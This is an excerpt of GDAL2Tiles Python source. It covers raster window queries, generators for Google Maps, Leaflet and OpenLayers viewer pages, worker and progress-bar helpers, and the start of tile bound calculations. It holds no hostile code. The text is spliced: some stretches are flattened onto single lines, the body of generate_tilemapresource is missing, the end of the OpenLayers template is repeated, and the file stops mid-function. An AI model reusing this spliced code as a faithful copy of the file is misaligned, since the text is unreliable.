tile_details def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0): """ For given dataset and query in cartographic coordinates returns parameters for ReadRaster() in raster coordinates and x/y shifts (for border tiles). If the querysize is not given, the extent is returned in the native resolution of dataset ds. 
raises Gdal2TilesError if the dataset does not contain anything inside this geo_query """ geotran = ds.GetGeoTransform() rx = int((ulx - geotran[0]) / geotran[1] + 0.001) ry = int((uly - geotran[3]) / geotran[5] + 0.001) rxsize = int((lrx - ulx) / geotran[1] + 0.5) rysize = int((lry - uly) / geotran[5] + 0.5) if not querysize: wxsize, wysize = rxsize, rysize else: wxsize, wysize = querysize, querysize # Coordinates should not go out of the bounds of the raster wx = 0 if rx < 0: rxshift = abs(rx) wx = int(wxsize * (float(rxshift) / rxsize)) wxsize = wxsize - wx rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize)) rx = 0 if rx + rxsize > ds.RasterXSize: wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize)) rxsize = ds.RasterXSize - rx wy = 0 if ry < 0: ryshift = abs(ry) wy = int(wysize * (float(ryshift) / rysize)) wysize = wysize - wy rysize = rysize - int(rysize * (float(ryshift) / rysize)) ry = 0 if ry + rysize > ds.RasterYSize: wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize)) rysize = ds.RasterYSize - ry return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize) def generate_tilemapresource(self): """ Template for tilemapresource.xml. Returns filled string. 
    def generate_googlemaps(self):
        """
        Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
        It returns filled string. Expected variables:
        title, googlemapskey, north, south, east, west, minzoom, maxzoom,
        tilesize, tileformat, publishurl
        """
        # Substitution values for the %-template below.
        args = {}
        args['title'] = self.options.title
        args['googlemapskey'] = self.options.googlekey
        args['south'], args['west'], args['north'], args['east'] = self.swne
        args['minzoom'] = self.tminz
        args['maxzoom'] = self.tmaxz
        args['tilesize'] = self.tilesize
        args['tileformat'] = self.tileext
        args['publishurl'] = self.options.url
        args['copyright'] = self.options.copyright

        # Static page header + the opacity-slider control and the tile
        # overlay setup (Google Maps API v2).  Raw string: backslashes in the
        # CSS/JS must survive verbatim.
        s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
            <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
              <head>
                <title>%(title)s</title>
                <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
                <meta http-equiv='imagetoolbar' content='no'/>
                <style type="text/css"> v\:* {behavior:url(#default#VML);}
                    html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
                    body { margin: 10px; background: #fff; }
                    h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
                    #header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
                    #subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
                    #map { height: 95%%; border: 1px solid #888; }
                </style>
                <script src='http://maps.google.com/maps?file=api&amp;v=2&amp;key=%(googlemapskey)s'></script>
                <script>
                //<![CDATA[

                /*
                 * Constants for given map
                 * TODO: read it from tilemapresource.xml
                 */

                var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
                var mapMinZoom = %(minzoom)s;
                var mapMaxZoom = %(maxzoom)s;

                var opacity = 0.75;
                var map;
                var hybridOverlay;

                /*
                 * Create a Custom Opacity GControl
                 * http://www.maptiler.org/google-maps-overlay-opacity-control/
                 */

                var CTransparencyLENGTH = 58;
                // maximum width that the knob can move (slide width minus knob width)

                function CTransparencyControl( overlay ) {
                    this.overlay = overlay;
                    this.opacity = overlay.getTileLayer().getOpacity();
                }
                CTransparencyControl.prototype = new GControl();

                // This function positions the slider to match the specified opacity
                CTransparencyControl.prototype.setSlider = function(pos) {
                    var left = Math.round((CTransparencyLENGTH*pos));
                    this.slide.left = left;
                    this.knob.style.left = left+"px";
                    this.knob.style.top = "0px";
                }

                // This function reads the slider and sets the overlay opacity level
                CTransparencyControl.prototype.setOpacity = function() {
                    // set the global variable
                    opacity = this.slide.left/CTransparencyLENGTH;
                    this.map.clearOverlays();
                    this.map.addOverlay(this.overlay, { zPriority: 0 });
                    if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
                        this.map.addOverlay(hybridOverlay);
                    }
                }

                // This gets called by the API when addControl(new CTransparencyControl())
                CTransparencyControl.prototype.initialize = function(map) {
                    var that=this;
                    this.map = map;

                    // Is this MSIE, if so we need to use AlphaImageLoader
                    var agent = navigator.userAgent.toLowerCase();
                    if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}

                    // create the background graphic as a <div> containing an image
                    var container = document.createElement("div");
                    container.style.width="70px";
                    container.style.height="21px";

                    // Handle transparent PNG files in MSIE
                    if (this.ie) {
                      var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
                      container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
                    } else {
                      container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
                    }

                    // create the knob as a GDraggableObject
                    // Handle transparent PNG files in MSIE
                    if (this.ie) {
                      var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
                      this.knob = document.createElement("div");
                      this.knob.style.height="21px";
                      this.knob.style.width="13px";
                      this.knob.style.overflow="hidden";
                      this.knob_img = document.createElement("div");
                      this.knob_img.style.height="21px";
                      this.knob_img.style.width="83px";
                      this.knob_img.style.filter=loader;
                      this.knob_img.style.position="relative";
                      this.knob_img.style.left="-70px";
                      this.knob.appendChild(this.knob_img);
                    } else {
                      this.knob = document.createElement("div");
                      this.knob.style.height="21px";
                      this.knob.style.width="13px";
                      this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
                      this.knob.style.backgroundPosition="-70px 0px";
                    }
                    container.appendChild(this.knob);
                    this.slide=new GDraggableObject(this.knob, {container:container});
                    this.slide.setDraggableCursor('pointer');
                    this.slide.setDraggingCursor('pointer');

                    this.container = container;

                    // attach the control to the map
                    map.getContainer().appendChild(container);

                    // init slider
                    this.setSlider(this.opacity);

                    // Listen for the slider being moved and set the opacity
                    GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
                    //GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });

                    return container;
                  }

                  // Set the default position for the control
                  CTransparencyControl.prototype.getDefaultPosition = function() {
                    return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
                  }

                /*
                 * Full-screen Window Resize
                 */

                function getWindowHeight() {
                    if (self.innerHeight) return self.innerHeight;
                    if (document.documentElement && document.documentElement.clientHeight)
                        return document.documentElement.clientHeight;
                    if (document.body) return document.body.clientHeight;
                    return 0;
                }

                function getWindowWidth() {
                    if (self.innerWidth) return self.innerWidth;
                    if (document.documentElement && document.documentElement.clientWidth)
                        return document.documentElement.clientWidth;
                    if (document.body) return document.body.clientWidth;
                    return 0;
                }

                function resize() {
                    var map = document.getElementById("map");
                    var header = document.getElementById("header");
                    var subheader = document.getElementById("subheader");
                    map.style.height = (getWindowHeight()-80) + "px";
                    map.style.width = (getWindowWidth()-20) + "px";
                    header.style.width = (getWindowWidth()-20) + "px";
                    subheader.style.width = (getWindowWidth()-20) + "px";
                    // map.checkResize();
                }


                /*
                 * Main load function:
                 */
                function load() {

                   if (GBrowserIsCompatible()) {

                      // Bug in the Google Maps: Copyright for Overlay is not correctly displayed
                      var gcr = GMapType.prototype.getCopyrights;
                      GMapType.prototype.getCopyrights = function(bounds,zoom) {
                          return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
                      }

                      map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );

                      map.addMapType(G_PHYSICAL_MAP);
                      map.setMapType(G_PHYSICAL_MAP);

                      map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));

                      hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
                      GEvent.addListener(map, "maptypechanged", function() {
                        if (map.getCurrentMapType() == G_HYBRID_MAP) {
                            map.addOverlay(hybridOverlay);
                        } else {
                           map.removeOverlay(hybridOverlay);
                        }
                      } );

                      var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
                      var mercator = new GMercatorProjection(mapMaxZoom+1);
                      tilelayer.getTileUrl = function(tile,zoom) {
                          if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
                              return "http://www.maptiler.org/img/none.png";
                          }
                          var ymax = 1 << zoom;
                          var y = ymax - tile.y -1;
                          var tileBounds = new GLatLngBounds(
                              mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
                              mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
                          );
                          if (mapBounds.intersects(tileBounds)) {
                              return zoom+"/"+tile.x+"/"+y+".png";
                          } else {
                              return "http://www.maptiler.org/img/none.png";
                          }
                      }
                      // IE 7-: support for PNG alpha channel
                      // Unfortunately, the opacity for whole overlay is then not changeable, either or...
                      tilelayer.isPng = function() { return true;};
                      tilelayer.getOpacity = function() { return opacity; }

                      overlay = new GTileLayerOverlay( tilelayer );
                      map.addOverlay(overlay);

                      map.addControl(new GLargeMapControl());
                      map.addControl(new GHierarchicalMapTypeControl());
                      map.addControl(new CTransparencyControl( overlay ));
        """ % args  # noqa

        # Optional Google Earth (KML) plugin hook-up.
        if self.kml:
            s += """
                      map.addMapType(G_SATELLITE_3D_MAP);
                      map.getEarthInstance(getEarthInstanceCB);
        """
        s += """

                      map.enableContinuousZoom();
                      map.enableScrollWheelZoom();

                      map.setMapType(G_HYBRID_MAP);
                   }
                   resize();
                }
        """

        # Callback that attaches the generated doc.kml as a network link
        # inside the Earth plugin instance.
        if self.kml:
            s += """
                function getEarthInstanceCB(object) {
                   var ge = object;

                   if (ge) {
                       var url = document.location.toString();
                       url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
                       var link = ge.createLink("");
                       if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
                       else { link.setHref(url) };
                       var networkLink = ge.createNetworkLink("");
                       networkLink.setName("TMS Map Overlay");
                       networkLink.setFlyToView(true);
                       networkLink.setLink(link);
                       ge.getFeatures().appendChild(networkLink);
                   } else {
                       // alert("You should open a KML in Google Earth");
                       // add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
                   }
                }
        """ % args  # noqa

        # Page footer with the mandatory attribution note.
        s += """
                onresize=function(){ resize(); };

                //]]>
                </script>
              </head>
              <body onload="load()">
                  <div id="header"><h1>%(title)s</h1></div>
                  <div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>,  <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
            <!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
                  </div>
                  <div id="map"></div>
              </body>
            </html>
        """ % args  # noqa

        return s
    def generate_leaflet(self):
        """
        Template for leaflet.html implementing overlay of tiles for 'mercator' profile.
        It returns filled string. Expected variables:
        title, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl
        """

        args = {}
        args['title'] = self.options.title.replace('"', '\\"')
        args['htmltitle'] = self.options.title
        args['south'], args['west'], args['north'], args['east'] = self.swne
        # NOTE(review): the names are swapped — 'centerlon' actually holds the
        # centre LATITUDE ((north+south)/2) and 'centerlat' the centre
        # LONGITUDE; the template passes [%(centerlon)s, %(centerlat)s] which
        # is the [lat, lng] order Leaflet expects, so the output is correct.
        args['centerlon'] = (args['north'] + args['south']) / 2.
        args['centerlat'] = (args['west'] + args['east']) / 2.
        args['minzoom'] = self.tminz
        args['maxzoom'] = self.tmaxz
        args['beginzoom'] = self.tmaxz
        args['tilesize'] = self.tilesize  # not used
        args['tileformat'] = self.tileext
        args['publishurl'] = self.options.url  # not used
        args['copyright'] = self.options.copyright.replace('"', '\\"')

        s = """<!DOCTYPE html>
        <html lang="en">
          <head>
            <meta charset="utf-8">
            <meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' />
            <title>%(htmltitle)s</title>

            <!-- Leaflet -->
            <link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.css" />
            <script src="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.js"></script>

            <style>
                body { margin:0; padding:0; }
                body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; }
                #map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */
                .ctl {
                    padding: 2px 10px 2px 10px;
                    background: white;
                    background: rgba(255,255,255,0.9);
                    box-shadow: 0 0 15px rgba(0,0,0,0.2);
                    border-radius: 5px;
                    text-align: right;
                }
                .title {
                    font-size: 18pt;
                    font-weight: bold;
                }
                .src {
                    font-size: 10pt;
                }

            </style>

          </head>
          <body>

          <div id="map"></div>

        <script>
        /* **** Leaflet **** */

        // Base layers
        //  .. OpenStreetMap
        var osm = L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', {attribution: '&copy; <a href="http://osm.org/copyright">OpenStreetMap</a> contributors'});

        //  .. CartoDB Positron
        var cartodb = L.tileLayer('http://{s}.basemaps.cartocdn.com/light_all/{z}/{x}/{y}.png', {attribution: '&copy; <a href="http://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, &copy; <a href="http://cartodb.com/attributions">CartoDB</a>'});

        //  .. OSM Toner
        var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.'});

        //  .. White background
        var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==");

        // Overlay layers (TMS)
        var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {tms: true, opacity: 0.7, attribution: "%(copyright)s"});

        // Map
        var map = L.map('map', {
            center: [%(centerlon)s, %(centerlat)s],
            zoom: %(beginzoom)s,
            minZoom: %(minzoom)s,
            maxZoom: %(maxzoom)s,
            layers: [osm]
        });

        var basemaps = {"OpenStreetMap": osm, "CartoDB Positron": cartodb, "Stamen Toner": toner, "Without background": white}
        var overlaymaps = {"Layer": lyr}

        // Title
        var title = L.control();
        title.onAdd = function(map) {
            this._div = L.DomUtil.create('div', 'ctl title');
            this.update();
            return this._div;
        };
        title.update = function(props) {
            this._div.innerHTML = "%(title)s";
        };
        title.addTo(map);

        // Note
        var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>,  <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>';
        var title = L.control({position: 'bottomleft'});
        title.onAdd = function(map) {
            this._div = L.DomUtil.create('div', 'ctl src');
            this.update();
            return this._div;
        };
        title.update = function(props) {
            this._div.innerHTML = src;
        };
        title.addTo(map);


        // Add base layers
        L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map);

        // Fit to overlay bounds (SW and NE points with (lat, lon))
        map.fitBounds([[%(south)s, %(east)s], [%(north)s, %(west)s]]);

        </script>

        </body>
        </html>

        """ % args  # noqa

        return s
    def generate_openlayers(self):
        """
        Template for openlayers.html implementing overlay of available Spherical Mercator layers.
        It returns filled string. Expected variables:
        title, bingkey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl
        """

        args = {}
        args['title'] = self.options.title
        args['bingkey'] = self.options.bingkey
        args['south'], args['west'], args['north'], args['east'] = self.swne
        args['minzoom'] = self.tminz
        args['maxzoom'] = self.tmaxz
        args['tilesize'] = self.tilesize
        args['tileformat'] = self.tileext
        args['publishurl'] = self.options.url
        args['copyright'] = self.options.copyright
        if self.options.tmscompatible:
            # Shift the TMS zoom by one when the layer was produced in
            # TMS-compatible mode (two tiles at level 0).
            args['tmsoffset'] = "-1"
        else:
            args['tmsoffset'] = ""
        if self.options.profile == 'raster':
            args['rasterzoomlevels'] = self.tmaxz + 1
            args['rastermaxresolution'] = 2**(self.nativezoom) * self.out_gt[1]

        # Page header.  NOTE(review): the <html xmlns=...> tag below appears
        # to be missing its closing '>' in the original template; reproduced
        # unchanged here.
        s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
            <html xmlns="http://www.w3.org/1999/xhtml"
              <head>
                <title>%(title)s</title>
                <meta http-equiv='imagetoolbar' content='no'/>
                <style type="text/css"> v\:* {behavior:url(#default#VML);}
                    html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
                    body { margin: 10px; background: #fff; }
                    h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
                    #header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
                    #subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
                    #map { height: 95%%; border: 1px solid #888; }
                    .olImageLoadError { display: none; }
                    .olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; }
                </style>""" % args  # noqa

        # The Google Maps API is only needed for the mercator base layers.
        if self.options.profile == 'mercator':
            s += """
                <script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script>""" % args

        s += """
                <script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script>
                <script>
                  var map;
                  var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s);
                  var mapMinZoom = %(minzoom)s;
                  var mapMaxZoom = %(maxzoom)s;
                  var emptyTileURL = "http://www.maptiler.org/img/none.png";
                  OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3;

                  function init(){""" % args

        # Per-profile map initialisation: base layers + the TMS overlay.
        if self.options.profile == 'mercator':
            s += """
                      var options = {
                          div: "map",
                          controls: [],
                          projection: "EPSG:3857",
                          displayProjection: new OpenLayers.Projection("EPSG:4326"),
                          numZoomLevels: 20
                      };
                      map = new OpenLayers.Map(options);

                      // Create Google Mercator layers
                      var gmap = new OpenLayers.Layer.Google("Google Streets",
                      {
                          type: google.maps.MapTypeId.ROADMAP,
                          sphericalMercator: true
                      });
                      var gsat = new OpenLayers.Layer.Google("Google Satellite",
                      {
                          type: google.maps.MapTypeId.SATELLITE,
                          sphericalMercator: true
                      });
                      var ghyb = new OpenLayers.Layer.Google("Google Hybrid",
                      {
                          type: google.maps.MapTypeId.HYBRID,
                          sphericalMercator: true
                      });
                      var gter = new OpenLayers.Layer.Google("Google Terrain",
                      {
                          type: google.maps.MapTypeId.TERRAIN,
                          sphericalMercator: true
                      });

                      // Create Bing layers
                      var broad = new OpenLayers.Layer.Bing({
                          name: "Bing Roads",
                          key: "%(bingkey)s",
                          type: "Road",
                          sphericalMercator: true
                      });
                      var baer = new OpenLayers.Layer.Bing({
                          name: "Bing Aerial",
                          key: "%(bingkey)s",
                          type: "Aerial",
                          sphericalMercator: true
                      });
                      var bhyb = new OpenLayers.Layer.Bing({
                          name: "Bing Hybrid",
                          key: "%(bingkey)s",
                          type: "AerialWithLabels",
                          sphericalMercator: true
                      });

                      // Create OSM layer
                      var osm = new OpenLayers.Layer.OSM("OpenStreetMap");

                      // create TMS Overlay layer
                      var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
                      {
                          serviceVersion: '.',
                          layername: '.',
                          alpha: true,
                          type: '%(tileformat)s',
                          isBaseLayer: false,
                          getURL: getURL
                      });
                      if (OpenLayers.Util.alphaHack() == false) {
                          tmsoverlay.setOpacity(0.7);
                      }

                      map.addLayers([gmap, gsat, ghyb, gter,
                                     broad, baer, bhyb,
                                     osm, tmsoverlay]);

                      var switcherControl = new OpenLayers.Control.LayerSwitcher();
                      map.addControl(switcherControl);
                      switcherControl.maximizeControl();

                      map.zoomToExtent(mapBounds.transform(map.displayProjection, map.projection));
        """ % args  # noqa

        elif self.options.profile == 'geodetic':
            s += """
                      var options = {
                          div: "map",
                          controls: [],
                          projection: "EPSG:4326"
                      };
                      map = new OpenLayers.Map(options);

                      var wms = new OpenLayers.Layer.WMS("VMap0",
                          "http://tilecache.osgeo.org/wms-c/Basic.py?",
                          {
                              layers: 'basic',
                              format: 'image/png'
                          }
                      );
                      var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
                      {
                          serviceVersion: '.',
                          layername: '.',
                          alpha: true,
                          type: '%(tileformat)s',
                          isBaseLayer: false,
                          getURL: getURL
                      });
                      if (OpenLayers.Util.alphaHack() == false) {
                          tmsoverlay.setOpacity(0.7);
                      }

                      map.addLayers([wms,tmsoverlay]);

                      var switcherControl = new OpenLayers.Control.LayerSwitcher();
                      map.addControl(switcherControl);
                      switcherControl.maximizeControl();

                      map.zoomToExtent(mapBounds);
        """ % args  # noqa

        elif self.options.profile == 'raster':
            s += """
                      var options = {
                          div: "map",
                          controls: [],
                          maxExtent: new OpenLayers.Bounds(%(west)s, %(south)s, %(east)s, %(north)s),
                          maxResolution: %(rastermaxresolution)f,
                          numZoomLevels: %(rasterzoomlevels)d
                      };
                      map = new OpenLayers.Map(options);

                      var layer = new OpenLayers.Layer.TMS("TMS Layer", "",
                      {
                          serviceVersion: '.',
                          layername: '.',
                          alpha: true,
                          type: '%(tileformat)s',
                          getURL: getURL
                      });

                      map.addLayer(layer);
                      map.zoomToExtent(mapBounds);
        """ % args  # noqa

        s += """
                      map.addControls([new OpenLayers.Control.PanZoomBar(),
                                       new OpenLayers.Control.Navigation(),
                                       new OpenLayers.Control.MousePosition(),
                                       new OpenLayers.Control.ArgParser(),
                                       new OpenLayers.Control.Attribution()]);
                  }
        """ % args

        # Per-profile getURL(): maps an OpenLayers tile request to the TMS
        # path produced by this tool, or to the empty tile placeholder.
        if self.options.profile == 'mercator':
            s += """
                  function getURL(bounds) {
                      bounds = this.adjustBounds(bounds);
                      var res = this.getServerResolution();
                      var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
                      var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
                      var z = this.getServerZoom();
                      if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') {
                          z+=1;
                      }
                      var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
                      var url = this.url;
                      if (OpenLayers.Util.isArray(url)) {
                          url = this.selectUrl(path, url);
                      }
                      if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
                          return url + path;
                      } else {
                          return emptyTileURL;
                      }
                  }
        """ % args  # noqa

        elif self.options.profile == 'geodetic':
            s += """
                  function getURL(bounds) {
                      bounds = this.adjustBounds(bounds);
                      var res = this.getServerResolution();
                      var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
                      var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
                      var z = this.getServerZoom()%(tmsoffset)s;
                      var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
                      var url = this.url;
                      if (OpenLayers.Util.isArray(url)) {
                          url = this.selectUrl(path, url);
                      }
                      if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
                          return url + path;
                      } else {
                          return emptyTileURL;
                      }
                  }
        """ % args  # noqa

        elif self.options.profile == 'raster':
            s += """
                  function getURL(bounds) {
                      bounds = this.adjustBounds(bounds);
                      var res = this.getServerResolution();
                      var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
                      var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
                      var z = this.getServerZoom();
                      var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
                      var url = this.url;
                      if (OpenLayers.Util.isArray(url)) {
                          url = this.selectUrl(path, url);
                      }
                      if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
                          return url + path;
                      } else {
                          return emptyTileURL;
                      }
                  }
        """ % args  # noqa

        # Common window-resize helpers and page footer with attribution.
        s += """
                  function getWindowHeight() {
                      if (self.innerHeight) return self.innerHeight;
                      if (document.documentElement && document.documentElement.clientHeight)
                          return document.documentElement.clientHeight;
                      if (document.body) return document.body.clientHeight;
                      return 0;
                  }

                  function getWindowWidth() {
                      if (self.innerWidth) return self.innerWidth;
                      if (document.documentElement && document.documentElement.clientWidth)
                          return document.documentElement.clientWidth;
                      if (document.body) return document.body.clientWidth;
                      return 0;
                  }

                  function resize() {
                      var map = document.getElementById("map");
                      var header = document.getElementById("header");
                      var subheader = document.getElementById("subheader");
                      map.style.height = (getWindowHeight()-80) + "px";
                      map.style.width = (getWindowWidth()-20) + "px";
                      header.style.width = (getWindowWidth()-20) + "px";
                      subheader.style.width = (getWindowWidth()-20) + "px";
                      if (map.updateSize) { map.updateSize(); };
                  }

                  onresize=function(){ resize(); };

                </script>
              </head>
              <body onload="init()">
                <div id="header"><h1>%(title)s</h1></div>
                <div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>,  <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
                <!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
                </div>
                <div id="map"></div>
                <script type="text/javascript" >resize()</script>
              </body>
            </html>""" % args  # noqa

        return s
THANK YOU --> </div> <div id="map"></div> <script type="text/javascript" >resize()</script> </body> </html>""" % args # noqa return s def worker_tile_details(input_file, output_folder, options, send_pipe=None): try: gdal2tiles = GDAL2Tiles(input_file, output_folder, options) gdal2tiles.open_input() gdal2tiles.generate_metadata() tile_job_info, tile_details = gdal2tiles.generate_base_tiles() return_data = (tile_job_info, tile_details) if send_pipe: send_pipe.send(return_data) return return_data except Exception as e: print("worker_tile_details failed ", str(e)) def progress_printer_thread(queue, nb_jobs): pb = ProgressBar(nb_jobs) pb.start() for _ in range(nb_jobs): queue.get() pb.log_progress() queue.task_done() class ProgressBar(object): def __init__(self, total_items): self.total_items = total_items self.nb_items_done = 0 self.current_progress = 0 self.STEP = 2.5 def start(self): sys.stdout.write("0") def log_progress(self, nb_items=1): self.nb_items_done += nb_items progress = float(self.nb_items_done) / self.total_items * 100 if progress >= self.current_progress + self.STEP: done = False while not done: if self.current_progress + self.STEP <= progress: self.current_progress += self.STEP if self.current_progress % 10 == 0: sys.stdout.write(str(int(self.current_progress))) if self.current_progress == 100: sys.stdout.write("\n") else: sys.stdout.write(".") else: done = True sys.stdout.flush() def get_tile_swne(tile_job_info, options): if options.profile == 'mercator': mercator = GlobalMercator() tile_swne = mercator.TileLatLonBounds elif options.profile == 'geodetic': geodetic = GlobalGeodetic(options.tmscompatible) tile_swne = geodetic.TileLatLonBounds elif options.profile == 'raster': srs4326 = osr.SpatialReference() srs4326.ImportFromEPSG(4326) if tile_job_info.kml and tile_job_info.in_srs_wkt: in_srs = osr.SpatialReference() in_srs.ImportFromWkt(tile_job_info.in_srs_wkt) ct = osr.CoordinateTransformation(in_srs, srs4326) def rastertileswne(x, y, z): pixelsizex 
